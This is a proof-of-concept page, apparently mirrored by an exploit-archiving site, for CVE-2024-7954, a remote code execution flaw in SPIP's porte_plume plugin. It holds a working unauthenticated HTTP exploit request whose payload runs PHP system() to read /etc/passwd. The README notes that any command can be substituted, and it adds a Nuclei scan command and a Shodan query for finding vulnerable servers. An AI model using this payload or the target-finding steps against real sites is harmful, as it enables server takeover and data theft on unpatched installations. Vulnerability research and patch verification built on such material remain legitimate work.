Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-7954 PoC — SPIP 安全漏洞

Source
https://github.com/Arthikw3b/RCE-CVE-2024-7954
Associated Vulnerability
Title:SPIP 安全漏洞 (CVE-2024-7954)
Description:SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。 SPIP存在安全漏洞,该漏洞源于容易受到任意代码执行漏洞的影响,远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求以SPIP用户身份执行任意PHP。
Readme
# RCE-CVE-2024-7954

## Description

The **porte_plume** plugin, utilized by SPIP versions prior to **4.30-alpha2**, **4.2.13**, and **4.1.16**, is susceptible to a critical **arbitrary code execution (RCE)** vulnerability. This flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by crafting a specific HTTP request. The potential for exploitation is severe, enabling attackers to run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.

### Vulnerability Details
- **Affected Software:** SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
- **Type of Vulnerability:** Remote Code Execution (RCE)
- **Severity Level:** Critical
- **Exploitability:** Remote and unauthenticated attackers can exploit this vulnerability.

## Exploit

##Nuclei Scan 

```
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





```
An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:

```
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
```

### Explanation of the Exploit:
- The `POST` request is directed to the **porte_plume_previsu** action of SPIP's index.php file.
- The **data** parameter contains a payload that leverages PHP's `system()` function to execute a command (in this case, `cat /etc/passwd`), which reads the contents of the password file.
- By changing the command within the `system()` function, an attacker could execute any PHP code on the server, leading to severe consequences.

## Shodan Dork

To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:

```
app="SPIP"
```

This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.
File Snapshot

 [4.0K]  /data/pocs/c3334eff89c8c07ff85477d4211705e13ccdb214
└── [2.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.